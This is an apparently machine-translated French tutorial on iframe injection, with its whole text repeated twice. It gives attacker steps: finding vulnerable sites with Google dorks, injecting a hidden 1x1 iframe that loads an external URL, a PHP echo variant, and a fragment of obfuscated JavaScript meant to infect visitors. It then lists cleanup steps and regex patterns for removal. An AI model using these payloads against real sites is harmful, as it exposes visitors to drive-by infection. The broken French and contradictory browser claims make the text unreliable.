Salut à tous dans ce tutoriel, je vais être vous raconter injection Iframe . Grâce à cette attaque récemment plus de 90000 pages sont touchés et il se propage très rapidement.
Une injection iframe est une injection de balises iframe un ou plusieurs dans le contenu d'une page.L'iframe fait habituellement quelque chose de mauvais, comme le téléchargement d'une application exécutable qui contient un virus ou un ver dedans ... quelque chose qui compromet le système d'un visiteur. Si vous avez un navigateur très récent (comme Firefox 2), puis des injections iFrame ne sont pas vraiment un souci - ces navigateurs ne sont pas assez intelligents pour automatiquement télécharger et exécuter des applications sans votre permission. Mais les anciens navigateurs sont plus confiants.
La balise <iframe> est une balise HTML utilisée pour intégrer de manière transparente le contenu d'une autre page ou un site. (Le «i» de «iframe» signifie «invisible», c'est à dire "trame invisible".) IFrames sont utilisés sur des milliers et des milliers de sites, parce que c'est ce que Google utilise pour ses publicités AdSense - le peu de JavaScript vous collez sur votre page finit par se retrouver l'insertion d'un <iframe> dans le code HTML de votre page.
1. Tout d'abord trouver des sites vulnérables en utilisant dorks google.
2. Puis tester la vulnérabilité en insérant des balises iframe en utilisant l'url.
3. Donc, si le site est vulnérable, puis insérez le code malveillant à l'intérieur du Iframe page web.
Par exemple, il / elle peut insérer le code suivant à l'aide de l'url:
<iframe src = "http://targetsite.net/?click=2730375" width = 1 Hauteur = 1 style = "visibility: hidden; position: absolute"> </ iframe>
Pour les pages Web PHP:
echo "<iframe src = " http://targetsite/web.html "width = 1 height = 1 style = "visibility: hidden; position: absolute "> </ iframe> ";
Occultation javascript:
fonction <script> c102916999516l4956a7e7c979e (l4956a7e7c9b86) {...
4. Donc, si le client charge la page, son système sera infecté.
1. Changez vos mots de passe de ftp, panneau de contrôle et de base de données.
2. Prévenez votre hébergeur à propos de l'attaque et de conseil à prendre des mesures contre une attaque possible du serveur de largeur ..
3. Changer les permissions de fichiers dans votre serveur en mode sécurisé au maximum.
4. Téléchargez tous vos fichiers à partir du serveur et vérifier les infections. Nettoyer les fichiers infectés.
5. En utilisant un logiciel antivirus bien, analyser et nettoyer tous les PC que vous utilisez pour vous connecter à votre serveur d'hébergement.
6. Ne jamais utiliser des ordinateurs publics pour accéder à votre serveur.
Utilisez les expressions suivantes pour rechercher toutes les pages containig le code malveillant et le remplacer par un espace:
1. <iframe src = "http:// [^"] * "width = 1 height = 1 style = " visibility: hidden , position: absolute "> </ iframe>
2. echo "<iframe src = " http:// [^ "] * " width = 1 height = 1 style = "visibility: hidden , position: absolute "> </ iframe> ";
. Vous pourriez avoir à écrire un script pour automatiser cette opération pour tous les fichiers sur le serveur
. Il s'agit d'un script php qui peut vous aider à trouver les fichiers infectés Télécharger elle et l'enregistrer comme remove.php (il est actuellement remove.php.txt) et de le transférer vers le dossier racine de votre site web.
.
Vous pouvez aussi modifier certaines valeurs codées en dur dans le fichier. Alors, pour cette visite l'url: http://www.yourdomain.com/anyname.php?c=iframe
Il va rechercher tous les fichiers de votre site Web et si l'un des fichiers contenant la chaîne donnée, il affichera le nom du fichier ainsi que le nombre d'occurrences de l' chaîne. Dans la capture d'écran ci-dessus, vous pouvez voir qu'un fichier est infecté. Notez que le script ne supprime pas les iframes partir de vos fichiers. Le nettoyage automatique pourrait briser certains de vos sites Web. Donc à partir de maintenant, vous aurez à nettoyer les fichiers manuellement.
J'espère que vous avez apprécié ce tutoriel et si vous avez un problème ou une question, vous pouvez demander dans les commentaires.
Qu'est-ce que l'injection Iframe?
Une injection iframe est une injection de balises iframe un ou plusieurs dans le contenu d'une page.L'iframe fait habituellement quelque chose de mauvais, comme le téléchargement d'une application exécutable qui contient un virus ou un ver dedans ... quelque chose qui compromet le système d'un visiteur. Si vous avez un navigateur très récent (comme Firefox 2), puis des injections iFrame ne sont pas vraiment un souci - ces navigateurs ne sont pas assez intelligents pour automatiquement télécharger et exécuter des applications sans votre permission. Mais les anciens navigateurs sont plus confiants.
Qu'est-ce que Iframe Tag?
La balise <iframe> est une balise HTML utilisée pour intégrer de manière transparente le contenu d'une autre page ou un site. (Le «i» de «iframe» signifie «invisible», c'est à dire "trame invisible".) IFrames sont utilisés sur des milliers et des milliers de sites, parce que c'est ce que Google utilise pour ses publicités AdSense - le peu de JavaScript vous collez sur votre page finit par se retrouver l'insertion d'un <iframe> dans le code HTML de votre page.
Qu'est-ce qu'un attaquant peut faire avec injection Iframe?
Utilisation d'injection Iframe, un attaquant peut injecter des publicités à l'intérieur de tout autre site Web, insérer des liens malveillants sites infectés ou vulnérables, rediriger vers des sites malveillants infectés et beaucoup plus.Comment faire pour effectuer l'injection Iframe?
1. Tout d'abord trouver des sites vulnérables en utilisant dorks google.
2. Puis tester la vulnérabilité en insérant des balises iframe en utilisant l'url.
3. Donc, si le site est vulnérable, puis insérez le code malveillant à l'intérieur du Iframe page web.
Par exemple, il / elle peut insérer le code suivant à l'aide de l'url:
<iframe src = "http://targetsite.net/?click=2730375" width = 1 Hauteur = 1 style = "visibility: hidden; position: absolute"> </ iframe>
Pour les pages Web PHP:
echo "<iframe src = " http://targetsite/web.html "width = 1 height = 1 style = "visibility: hidden; position: absolute "> </ iframe> ";
Occultation javascript:
fonction <script> c102916999516l4956a7e7c979e (l4956a7e7c9b86) {...
4. Donc, si le client charge la page, son système sera infecté.
Ce que vous devez faire, si vous êtes infecté par injection Iframe?
1. Changez vos mots de passe de ftp, panneau de contrôle et de base de données.
2. Prévenez votre hébergeur à propos de l'attaque et de conseil à prendre des mesures contre une attaque possible du serveur de largeur ..
3. Changer les permissions de fichiers dans votre serveur en mode sécurisé au maximum.
4. Téléchargez tous vos fichiers à partir du serveur et vérifier les infections. Nettoyer les fichiers infectés.
5. En utilisant un logiciel antivirus bien, analyser et nettoyer tous les PC que vous utilisez pour vous connecter à votre serveur d'hébergement.
6. Ne jamais utiliser des ordinateurs publics pour accéder à votre serveur.
Comment nettoyer les fichiers infectés?
Utilisez les expressions suivantes pour rechercher toutes les pages containig le code malveillant et le remplacer par un espace:
1. <iframe src = "http:// [^"] * "width = 1 height = 1 style = " visibility: hidden , position: absolute "> </ iframe>
2. echo "<iframe src = " http:// [^ "] * " width = 1 height = 1 style = "visibility: hidden , position: absolute "> </ iframe> ";
. Vous pourriez avoir à écrire un script pour automatiser cette opération pour tous les fichiers sur le serveur
. Il s'agit d'un script php qui peut vous aider à trouver les fichiers infectés Télécharger elle et l'enregistrer comme remove.php (il est actuellement remove.php.txt) et de le transférer vers le dossier racine de votre site web.
.
Vous pouvez aussi modifier certaines valeurs codées en dur dans le fichier. Alors, pour cette visite l'url: http://www.yourdomain.com/anyname.php?c=iframe
Il va rechercher tous les fichiers de votre site Web et si l'un des fichiers contenant la chaîne donnée, il affichera le nom du fichier ainsi que le nombre d'occurrences de l' chaîne. Dans la capture d'écran ci-dessus, vous pouvez voir qu'un fichier est infecté. Notez que le script ne supprime pas les iframes partir de vos fichiers. Le nettoyage automatique pourrait briser certains de vos sites Web. Donc à partir de maintenant, vous aurez à nettoyer les fichiers manuellement.
J'espère que vous avez apprécié ce tutoriel et si vous avez un problème ou une question, vous pouvez demander dans les commentaires.